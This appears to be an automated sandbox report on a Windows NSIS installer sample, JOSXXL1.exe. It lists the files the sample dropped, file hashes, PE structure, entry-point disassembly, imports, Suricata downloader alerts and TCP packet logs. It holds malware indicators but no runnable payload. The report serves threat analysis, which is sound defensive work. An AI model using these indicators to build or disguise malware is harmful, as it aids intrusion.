                                                                                                      SHA1:90DE8C19016E7121C2861CF748262A44F57C2DE0
                                                                                                      SHA-256:404E86068579D935C692F89EBB98EBA6D930A536B4833468C536F1A0273FDDE2
                                                                                                      SHA-512:CA8A1951D4013297A2168DB38027E8F9904838576AF4B59FAC09655F976C45966E58656038D51EBF0593A82F7A9B826276C65465CF8845FE299F7358D15F1C1C
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:..................b..................................o................r.........J..................a...........................................U..B....3..........5................................<.... ..7.................J..............j.........................e...A.....W............................................................4........................................%.......V...................?..........................................................|....'...C..#....0.....................................................'........................u ...1...............].....9..................?.........N...........................................O..............z..............V..............0...................6............/.................K.....!.....s.............%...........................:............................c.....F.........................F..0..........)..............n.....................q....V...H......................................................................

                                                                                                      C:\Users\user\AppData\Local\indvandrings\attraavrdig\Udeladelsens.txt

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):402
                                                                                                      Entropy (8bit):4.310269764673079
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:hDVKJgrLT/qUl/HHjaTaGhSdWJ2ccMFMxMALLotLn:heg3T/qUNjlG48JGmL
                                                                                                      MD5:4EF1859A18FB4C5B61DB725AAFE27F90
                                                                                                      SHA1:D31A038EA086536F22BF7D64FF099AD5D8800706
                                                                                                      SHA-256:D21E0CD7A7C2E95FFCAFCD23F04D2A232729F672FBB47B7D0776ABB3229FBB0B
                                                                                                      SHA-512:1B9C8AE8B6FDC1D1BCAA69CB748C3CBEE764573D4DDBF40DD8D307B63365650D9B85E3EA386028F8DDBE32DA5237771D6996721107EED18CBA71E20D07BB5E7E
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:vacillate viklendes contemnible counterpropagandize replevining,azelate fortrydendes centrum heavenwardly misalign kokettens,signalanalyser skeformedes kyklops irredeemably filibusters unlobed fuchi unbonny tilkomnes sjapis alsine..tensive ophavsretsindehaveren ubehagene korrelaters.srinteresseomraaders brernes circumvolve nonsuit.tumbek haversacks hjrekant systemeringen russophilism labarums ogsaa.

                                                                                                      C:\Users\user\AppData\Local\indvandrings\attraavrdig\Vandlbslov.Uni

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):275595
                                                                                                      Entropy (8bit):7.754632703695257
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:9nidKxAdInQvWBm+qEZpNPLpG2wdJ1Nj/7wUdPHbZrhqassD2RN0DsU:gUCCnQvh+93/wP1zPHb5hl88r
                                                                                                      MD5:4676EBA5220757447D27571E8299B3AE
                                                                                                      SHA1:B3895C58A55C480C330A642175923025D47EE198
                                                                                                      SHA-256:88D22420602D6EC710ED98BE4651416382BD598FEC5C0A1B29FE9606189D93E7
                                                                                                      SHA-512:027386BF7D50A8B0AE621A415EDDF00E321B7A871E058BF25031408C7E3E429446B49FF10497D31CF05EEAD7E06DB9704A779A78A97911DAA09B6FA3EA74EF91
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:..JJ...x.....~~~~~.........................0.....MMMM............$$...........NN.\\..pp......M.L......t..V...........................9...QQ................8..............%%%..................................kk...............66666......................X.11............+........~........i.......W......x.....'....~.............///.&........,,..............................I............................\.B..""""...}}}}}.4.`.......jj...jj.\..n...f.G...F..11......u.....-."".y....oooo........oo............--.........x.......................................uuu......~..gg.......................N..9........'........._..(...........++.]....................................4444............................\....WW.QQ.PP..7.....bbbbb.....;;..............===......................pp.))......./.....VV................c.......::..............fff......................ooo.....ZZZ.rrr.@@.)......."......;;.............VV....4..............UU............???...--.~..S......tt........p.o.\\\..............7..........

                                                                                                      C:\Users\user\AppData\Local\indvandrings\attraavrdig\nontelegraphical.hyp

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      File Type:GTA audio index data (SDT)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):275043
                                                                                                      Entropy (8bit):2.2851189268291714
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:xwxFmKCuH60CJ++DBpgfz/f/WpT7CiSKP4FMWYOSQotMddJ3toh6:YtCQ63az/GpqiSjWWfo279eh6
                                                                                                      MD5:21BDD59977EA7CD06C63391AA9FD189E
                                                                                                      SHA1:9CC5B83758407C6D78BD2A96E6A31533C640C524
                                                                                                      SHA-256:B301C24D700076375EAA2394A9E0B754DDAA6A6A7066E8B7AE6FFAEA259B03D4
                                                                                                      SHA-512:042B6B7234BAC120CFEFA13DB48E1EF116ADB1F9FE60120A815973E485987C01751F27F6482FDC6FDF84B005FA3CE359A9DC13BC49ACD255383D2B8CD5C10E6C
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:.........;..X.........................s...............................3........A........................B...ew....$.................4p................................................{.......B..........................#.........M................6....o.._...........c.....J,...........W......!.....G.....................S......T..X.....t..V.......................................................................................................u..|..............^............d..............%...........j..................R. ...S.......Q........'...(......e....[.cv...........................................C....g.............3........z...0................_..................q....................g...............Y..i....................1......;........................3n....................i...R2.............................................~...............................:...........................n....................[...................................................I......}..........M........W

                                                                                                      C:\Users\user\AppData\Local\indvandrings\attraavrdig\sluggardly.udf

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):456817
                                                                                                      Entropy (8bit):2.2861700746844575
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:Up3Z9pSH0D11/iNlORIFbTYVN7kjQD/48cin2ij5RQq458mu0FnkLfmcJmiIMaDE:SpGH0Elc7mwkk2q5Yfu2nkL+c7wehb
                                                                                                      MD5:DEEA5D4F6617FE0772227FD43368936F
                                                                                                      SHA1:AE52FCB091DCE0118E79E4FF46F0A04BB25C350A
                                                                                                      SHA-256:268FCAE0EC44A3E572DFC0BF3C55306200687AA96ED484E50FAE4F1FDC400E04
                                                                                                      SHA-512:94573F2C11958E46A75009461FFE4F6CD00ED6C1CF4C5F02C942773262D2DB0311FD8778B47B418C27826039B5B7895440528AAEA80F0E3D5C5FCFD1FB4ECAE9
                                                                                                      Malicious:false
                                                                                                      Preview:...X....I................B..........................B..........................q....\.\..........]..K.................H....................(...%....x..........U?............&......F........^....=....[..................Z.........1....................#....t..D..4.......................$.-....).............,.................~........7.......{...=..>......o......................~......f.......................g.......g......7...........}.......Q.........w...T.............................................................[.........=.......f..........6...........N..........Y....................(.........&....U....|5...A...@......."q.............................].....t.l.....*......9..............)..........+.............XV|).................................k.....S.....W)........+..............l..w................9..u.......................{.w..e.t......../........'...........I..........+...............................................................%.!.....................{..... ...........a.

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                      Entropy (8bit):7.856772626299688
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:JOSXXL1.exe
                                                                                                      File size:811'667 bytes
                                                                                                      MD5:fb24966daab46af066a7b7c041236de9
                                                                                                      SHA1:391bb0f3da952bbbf14b61b7f6c01175344be882
                                                                                                      SHA256:8e5d0c237ba87f5b445c7edcf6d5ea6071fb873c64b6431f4f98527461aac37d
                                                                                                      SHA512:7086d3a365f1fd90b26309ca87c70a872c10badc03a47e96997465c1e8db755d8de05c5321af6e7b53d566acb6193ded5b331f7232df22b4dad881a3533a764f
                                                                                                      SSDEEP:12288:XDGxeWd8KhMLxCTSr+lZbYk4z+pmUd0CP/TtybfkmvKAFfyhRY2ULwMaVZl:W3ddhMLiSKlGkZhVBy7BvHyhR3ULxe/
                                                                                                      TLSH:5D0512C1F5D0ECC2DC770CB19C39FA6256167D6E6C38061DFAAAB26D9177223206B41B
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P...s...P...V...P..Rich.P..........................PE..L...y..V.................b...*.....

                                                                                                      File Icon

                                                                                                      Icon Hash:0d39254252426213

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x4033b6
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x567F8479 [Sun Dec 27 06:26:01 2015 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:7192d3773f389d45ebac3cc67d054a8a

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      sub esp, 000002D4h
                                                                                                      push ebp
                                                                                                      push esi
                                                                                                      push 00000020h
                                                                                                      xor ebp, ebp
                                                                                                      pop esi
                                                                                                      mov dword ptr [esp+0Ch], ebp
                                                                                                      push 00008001h
                                                                                                      mov dword ptr [esp+0Ch], 0040A230h
                                                                                                      mov dword ptr [esp+18h], ebp
                                                                                                      call dword ptr [004080B4h]
                                                                                                      call dword ptr [004080B0h]
                                                                                                      cmp ax, 00000006h
                                                                                                      je 00007F44345FDFC3h
                                                                                                      push ebp
                                                                                                      call 00007F443460111Eh
                                                                                                      cmp eax, ebp
                                                                                                      je 00007F44345FDFB9h
                                                                                                      push 00000C00h
                                                                                                      call eax
                                                                                                      push ebx
                                                                                                      push edi
                                                                                                      push 0040A3B0h
                                                                                                      call 00007F443460109Bh
                                                                                                      push 0040A3A8h
                                                                                                      call 00007F4434601091h
                                                                                                      push 0040A39Ch
                                                                                                      call 00007F4434601087h
                                                                                                      push 00000009h
                                                                                                      call 00007F44346010ECh
                                                                                                      push 00000007h
                                                                                                      call 00007F44346010E5h
                                                                                                      mov dword ptr [0042A264h], eax
                                                                                                      call dword ptr [00408044h]
                                                                                                      push ebp
                                                                                                      call dword ptr [004082A8h]
                                                                                                      mov dword ptr [0042A318h], eax
                                                                                                      push ebp
                                                                                                      lea eax, dword ptr [esp+34h]
                                                                                                      push 000002B4h
                                                                                                      push eax
                                                                                                      push ebp
                                                                                                      push 00421708h
                                                                                                      call dword ptr [0040818Ch]
                                                                                                      push 0040A384h
                                                                                                      push 00429260h
                                                                                                      call 00007F4434600CD2h
                                                                                                      call dword ptr [004080ACh]
                                                                                                      mov ebx, 00435000h
                                                                                                      push eax
                                                                                                      push ebx
                                                                                                      call 00007F4434600CC0h
                                                                                                      push ebp
                                                                                                      call dword ptr [00408178h]

                                                                                                      Rich Headers

                                                                                                      Programming Language:
                                                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x84bc0xa0.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x4f0000x28410.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b8.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000x615e0x620041c79e199a2175acbe73d4712982d296False0.6625876913265306data6.4557374109402IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0x80000x13700x14009cbedf8ff452ddf88e3b9cf6f80372a9False0.4404296875data5.102148788391081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0xa0000x203580x60073e3da5d6c2dd1bec8a02d238a90e209False0.5149739583333334data4.09485328769633IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .ndata0x2b0000x240000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .rsrc0x4f0000x284100x2860051b7894a0db615e33d0e483e70402f1bFalse0.5889669601393189data6.83951124806165IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                      RT_ICON0x4f4180x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.2257778303560866
                                                                                                      RT_ICON0x5fc400x98ddPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9996422456750057
                                                                                                      RT_ICON0x695200x730fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9982006450517739
                                                                                                      RT_ICON0x708300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.40985477178423235
                                                                                                      RT_ICON0x72dd80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4603658536585366
                                                                                                      RT_ICON0x73e800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5559701492537313
                                                                                                      RT_ICON0x74d280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.5537003610108303
                                                                                                      RT_ICON0x755d00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.33963414634146344
                                                                                                      RT_ICON0x75c380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.37283236994219654
                                                                                                      RT_ICON0x761a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6551418439716312
                                                                                                      RT_ICON0x766080x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.44623655913978494
                                                                                                      RT_ICON0x768f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.49324324324324326
                                                                                                      RT_DIALOG0x76a180x120dataEnglishUnited States0.5138888888888888
                                                                                                      RT_DIALOG0x76b380x11cdataEnglishUnited States0.6091549295774648
                                                                                                      RT_DIALOG0x76c580xc4dataEnglishUnited States0.5918367346938775
                                                                                                      RT_DIALOG0x76d200x60dataEnglishUnited States0.7291666666666666
                                                                                                      RT_GROUP_ICON0x76d800xaedataEnglishUnited States0.6264367816091954
                                                                                                      RT_VERSION0x76e300x29cdataEnglishUnited States0.5089820359281437
                                                                                                      RT_MANIFEST0x770d00x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GetDiskFreeSpaceW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                      USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
                                                                                                      GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                      SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                      ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                      COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                      ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                      Possible Origin

                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                      EnglishUnited States

                                                                                                      Network Behavior

                                                                                                      Suricata IDS Alerts

                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2024-10-26T23:57:11.745999+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.461847142.250.185.238443TCP
                                                                                                      2024-10-26T23:57:18.573757+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.461886193.122.130.080TCP
                                                                                                      2024-10-26T23:57:20.417495+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.461886193.122.130.080TCP
                                                                                                      2024-10-26T23:57:21.167832+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.461902188.114.96.3443TCP
                                                                                                      2024-10-26T23:57:21.890371+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.461908193.122.130.080TCP
                                                                                                      2024-10-26T23:57:22.626862+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.461913188.114.96.3443TCP
                                                                                                      2024-10-26T23:57:23.355007+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.461919193.122.130.080TCP
                                                                                                      2024-10-26T23:57:24.129743+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.461922188.114.96.3443TCP
                                                                                                      2024-10-26T23:57:25.708387+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.461933188.114.96.3443TCP
                                                                                                      2024-10-26T23:57:27.148944+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.461945188.114.96.3443TCP
                                                                                                      2024-10-26T23:57:31.552767+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.461976188.114.96.3443TCP

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Oct 26, 2024 23:57:10.413517952 CEST61847443192.168.2.4142.250.185.238
                                                                                                      Oct 26, 2024 23:57:10.413598061 CEST44361847142.250.185.238192.168.2.4
                                                                                                      Oct 26, 2024 23:57:10.413686037 CEST61847443192.168.2.4142.250.185.238
                                                                                                      Oct 26, 2024 23:57:10.445158005 CEST61847443192.168.2.4142.250.185.238
                                                                                                      Oct 26, 2024 23:57:10.445188999 CEST44361847142.250.185.238192.168.2.4
                                                                                                      Oct 26, 2024 23:57:11.322999954 CEST44361847142.250.185.238192.168.2.4
                                                                                                      Oct 26, 2024 23:57:11.323093891 CEST61847443192.168.2.4142.250.185.238
                                                                                                      Oct 26, 2024 23:57:11.324088097 CEST44361847142.250.185.238192.168.2.4
                                                                                                      Oct 26, 2024 23:57:11.324143887 CEST61847443192.168.2.4142.250.185.238
                                                                                                      Oct 26, 2024 23:57:11.373925924 CEST61847443192.168.2.4142.250.185.238
                                                                                                      Oct 26, 2024 23:57:11.373963118 CEST44361847142.250.185.238192.168.2.4
                                                                                                      Oct 26, 2024 23:57:11.374906063 CEST44361847142.250.185.238192.168.2.4
                                                                                                      Oct 26, 2024 23:57:11.375037909 CEST61847443192.168.2.4142.250.185.238
                                                                                                      Oct 26, 2024 23:57:11.380110025 CEST61847443192.168.2.4142.250.185.238
                                                                                                      Oct 26, 2024 23:57:11.423353910 CEST44361847142.250.185.238192.168.2.4
                                                                                                      Oct 26, 2024 23:57:11.746026039 CEST44361847142.250.185.238192.168.2.4
                                                                                                      Oct 26, 2024 23:57:11.746102095 CEST61847443192.168.2.4142.250.185.238
                                                                                                      Oct 26, 2024 23:57:11.746331930 CEST61847443192.168.2.4142.250.185.238
                                                                                                      Oct 26, 2024 23:57:11.746421099 CEST44361847142.250.185.238192.168.2.4
                                                                                                      Oct 26, 2024 23:57:11.746548891 CEST61847443192.168.2.4142.250.185.238
                                                                                                      Oct 26, 2024 23:57:11.784450054 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:11.784491062 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:11.784554958 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:11.784840107 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:11.784854889 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:12.646903992 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:12.647021055 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:12.652600050 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:12.652622938 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:12.652988911 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:12.654660940 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:12.655186892 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:12.695341110 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.133436918 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.133825064 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.134619951 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.134841919 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.250292063 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.250394106 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.250441074 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.250499964 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.250514984 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.250567913 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.250579119 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.250629902 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.250931025 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.250994921 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.251203060 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.251260996 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.251291990 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.251352072 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.251667023 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.251723051 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.253890991 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.253952980 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.253982067 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.254045963 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.367450953 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.367532015 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.367553949 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.367609978 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.367948055 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.368005991 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.368032932 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.368082047 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.368438005 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.368490934 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.368520975 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.368585110 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.368892908 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.368948936 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.368976116 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.369024992 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.371115923 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.371191978 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.371294975 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.371351004 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.371383905 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.371443033 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.485538006 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.485693932 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.485764980 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.485765934 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.485778093 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.485829115 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.485873938 CEST61854443192.168.2.4142.250.181.225
